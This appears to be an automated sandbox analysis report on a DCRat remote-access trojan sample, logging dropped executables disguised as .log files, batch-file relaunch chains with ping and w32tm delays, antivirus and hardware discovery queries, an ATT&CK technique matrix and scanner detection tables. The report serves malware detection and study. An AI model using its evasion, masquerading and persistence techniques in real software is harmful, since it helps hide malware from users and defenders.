                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JRYtVobT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NEXrZULz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Dropped PE file which has not been started: C:\Users\user\Desktop\WUhawSrf.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\YbtaoKyW.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\BGEGNIeN.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\shEGUPEJ.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\BVbCJhtL.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\LfVByPYY.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\KFIMcleA.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\cKWbBtXG.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\XfGAYNcS.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\TvubsmQz.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\XRIjRSGa.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\adhyQtRa.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\eTWARqDK.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\VtGsqNSz.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\TJILxrgf.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\BmiVXCnN.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\fpYOnkHi.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\vNbglcZZ.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\SiSqReIq.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\wWhDskZv.log
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                Dropped PE file which has not been started: C:\Users\user\Desktop\kxbWRuhA.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\sMBlRSok.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\ofivtIHo.log
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Dropped PE file which has not been started: C:\Users\user\Desktop\ByUnjZDH.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\RlvripyF.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\BQYWEsJr.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\qmowuovM.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\iWdYRpBW.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\TArJFQhB.log
                                Dropped PE file which has not been started: C:\Users\user\Desktop\kPsHDmnV.log
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                TID: 7128, Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                TID: 2200, Thread sleep time: -30000s >= -30000s
                                TID: 1292, Thread sleep time: -922337203685477s >= -30000s
                                TID: 6648, Thread sleep time: -30000s >= -30000s
                                TID: 5176, Thread sleep time: -922337203685477s >= -30000s
                                TID: 1100, Thread sleep time: -30000s >= -30000s
                                TID: 4708, Thread sleep time: -922337203685477s >= -30000s
                                TID: 3752, Thread sleep time: -30000s >= -30000s
                                TID: 5332, Thread sleep time: -922337203685477s >= -30000s
                                TID: 5064, Thread sleep time: -30000s >= -30000s
                                TID: 4592, Thread sleep time: -922337203685477s >= -30000s
                                TID: 5564, Thread sleep time: -30000s >= -30000s
                                TID: 6772, Thread sleep time: -922337203685477s >= -30000s
                                TID: 4696, Thread sleep time: -30000s >= -30000s
                                TID: 3408, Thread sleep time: -922337203685477s >= -30000s
                                TID: 6584, Thread sleep time: -30000s >= -30000s
                                TID: 5884, Thread sleep time: -922337203685477s >= -30000s
                                TID: 2668, Thread sleep time: -30000s >= -30000s
                                TID: 1216, Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exe
                                Last function: Thread delayed
                            Source: C:\Windows\System32\PING.EXE
                                Last function: Thread delayed
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                File opened: C:\Users\user\Documents\desktop.ini
                                File opened: C:\Users\user
                                File opened: C:\Users\user\AppData\Local\Temp
                                File opened: C:\Users\user\AppData
                                File opened: C:\Users\user\AppData\Local
                                File opened: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                Process information queried: ProcessInformation
                                Code function: 0_2_00007FF848C031F2 rdtsc 0_2_00007FF848C031F2
                                Process token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                Memory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\teh76E2k50.exe
                                Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
                            Source: C:\Windows\System32\cmd.exe
                                Process created: C:\Windows\System32\chcp.com chcp 65001
                                Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat"
                            Source: C:\Windows\System32\cmd.exe
                                Process created: C:\Windows\System32\chcp.com chcp 65001
                                Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat"
                            Source: C:\Windows\System32\cmd.exe
                                Process created: C:\Windows\System32\chcp.com chcp 65001
                                Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat"
                            Source: C:\Windows\System32\cmd.exe
                                Process created: C:\Windows\System32\chcp.com chcp 65001
                                Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat"
                            Source: C:\Windows\System32\cmd.exe
                                Process created: C:\Windows\System32\chcp.com chcp 65001
                                Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat"
                            Source: C:\Windows\System32\cmd.exe
                                Process created: C:\Windows\System32\chcp.com chcp 65001
                                Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Queries volume information: C:\Users\user\Desktop\teh76E2k50.exe VolumeInformation
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2777547098.000000001BF30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2515147316.000000001BA46000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2512547472.000000001B5B0000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2668501857.000000001B78D000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2667164126.000000001B44D000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2872187878.000000001BB1D000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2868866041.000000001B832000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2972062578.000000001B0F2000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3322655099.000000001BCB7000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3345697219.000000001C023000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            Source: Yara match File source: 00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: teh76E2k50.exe PID: 5772, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe PID: 4072, type: MEMORYSTR
                            Source: Yara match File source: teh76E2k50.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.teh76E2k50.exe.8f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, type: DROPPED
                            Source: Yara match File source: C:\Windows\SchCache\sihost.exe, type: DROPPED

                            Remote Access Functionality

                            Source: Yara match File source: 00000000.00000002.2310983468.00000000133EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: teh76E2k50.exe PID: 5772, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe PID: 4072, type: MEMORYSTR
                            Source: Yara match File source: teh76E2k50.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.teh76E2k50.exe.8f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.2197360091.00000000008F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, type: DROPPED
                            Source: Yara match File source: C:\Windows\SchCache\sihost.exe, type: DROPPED
                            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                            Gather Victim Identity Information1
                            Scripting
                            Valid Accounts141
                            Windows Management Instrumentation
                            1
                            Scripting
                            11
                            Process Injection
                            33
                            Masquerading
                            OS Credential Dumping251
                            Security Software Discovery
                            Remote Services11
                            Archive Collected Data
                            1
                            Encrypted Channel
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            Registry Run Keys / Startup Folder
                            1
                            Registry Run Keys / Startup Folder
                            1
                            Disable or Modify Tools
                            LSASS Memory1
                            Process Discovery
                            Remote Desktop ProtocolData from Removable Media2
                            Ingress Tool Transfer
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            151
                            Virtualization/Sandbox Evasion
                            Security Account Manager151
                            Virtualization/Sandbox Evasion
                            SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                            Process Injection
                            NTDS1
                            Remote System Discovery
                            Distributed Component Object ModelInput Capture12
                            Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information
                            LSA Secrets1
                            System Network Configuration Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                            Obfuscated Files or Information
                            Cached Domain Credentials2
                            File and Directory Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Software Packing
                            DCSync34
                            System Information Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading
                            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            [Behavior Graph. ID: 1547568; Sample: teh76E2k50.exe; Start date: 02/11/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
teh76E2k50.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
teh76E2k50.exe | 100% | Avira | HEUR/AGEN.1323342
teh76E2k50.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\Desktop\BVbCJhtL.log | 100% | Avira | TR/AVI.Agent.updqb
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat | 100% | Avira | BAT/Delbat.C
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\BSjUAQPo.log | 100% | Joe Sandbox ML
C:\Users\user\Desktop\ASPeVAWX.log | 100% | Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\BMbUPQnU.log | 100% | Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AQotzTRR.log | 21% | ReversingLabs
C:\Users\user\Desktop\ASPeVAWX.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\AVHMeQAt.log | 24% | ReversingLabs
C:\Users\user\Desktop\AWpwsIZS.log | 12% | ReversingLabs
C:\Users\user\Desktop\AefMODTq.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ApHNCCYS.log | 3% | ReversingLabs
C:\Users\user\Desktop\BGEGNIeN.log | 21% | ReversingLabs
C:\Users\user\Desktop\BMbUPQnU.log | 5% | ReversingLabs
C:\Users\user\Desktop\BQYWEsJr.log | 24% | ReversingLabs
C:\Users\user\Desktop\BSjUAQPo.log | 4% | ReversingLabs
C:\Users\user\Desktop\BVbCJhtL.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BWJmXZSj.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\BmiVXCnN.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy
C:\Users\user\Desktop\BpxnzmkL.log | 5% | ReversingLabs
C:\Users\user\Desktop\ByUnjZDH.log | 13% | ReversingLabs
C:\Users\user\Desktop\CJDckQCP.log | 21% | ReversingLabs
C:\Users\user\Desktop\CUHLiuul.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\CYbeNrdN.log | 4% | ReversingLabs
C:\Users\user\Desktop\CYcTTrrX.log | 5% | ReversingLabs
C:\Users\user\Desktop\CjKdtCCI.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\CwClOmSr.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DAfcAdjS.log | 8% | ReversingLabs
C:\Users\user\Desktop\DBTJGhcJ.log | 8% | ReversingLabs
C:\Users\user\Desktop\DDuvcNgQ.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DMSuMAAN.log | 13% | ReversingLabs
C:\Users\user\Desktop\DUVDVzTj.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\DVEbprGR.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\DXOleQyG.log | 17% | ReversingLabs
C:\Users\user\Desktop\DqCnHdQh.log | 13% | ReversingLabs
C:\Users\user\Desktop\DswJWuJN.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EVCmjrsI.log | 8% | ReversingLabs
C:\Users\user\Desktop\EeGvsrMf.log | 17% | ReversingLabs
C:\Users\user\Desktop\EzoTkVXm.log | 4% | ReversingLabs
C:\Users\user\Desktop\FFhdxwlL.log | 17% | ReversingLabs
C:\Users\user\Desktop\FFnbpIFd.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\FIZLHNPh.log | 25% | ReversingLabs
C:\Users\user\Desktop\FJIjaFCP.log | 4% | ReversingLabs
C:\Users\user\Desktop\FUptAQNB.log | 8% | ReversingLabs
C:\Users\user\Desktop\FxxLTNKF.log | 8% | ReversingLabs
C:\Users\user\Desktop\GGiDqFDB.log | 21% | ReversingLabs
C:\Users\user\Desktop\GOTKaosQ.log | 3% | ReversingLabs
